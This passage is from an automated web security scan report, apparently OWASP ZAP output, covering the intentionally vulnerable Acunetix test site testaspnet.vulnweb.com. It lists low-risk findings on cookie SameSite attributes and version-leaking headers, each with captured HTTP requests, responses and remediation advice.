8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

  5. Risk=Low, Confidence=Medium (99)

    1. http://testaspnet.vulnweb.com (99)

      1. Cookie without SameSite Attribute (2)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

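          A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a "cross-site" request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks.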

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          ASP.NET_SessionId
          Evidence
          Set-Cookie: ASP.NET_SessionId
          Solution

          Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

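          A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks.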

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          
          Parameter
          ASP.NET_SessionId
          Evidence
          Set-Cookie: ASP.NET_SessionId
          Solution

          Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies.

      2. Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) (38)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
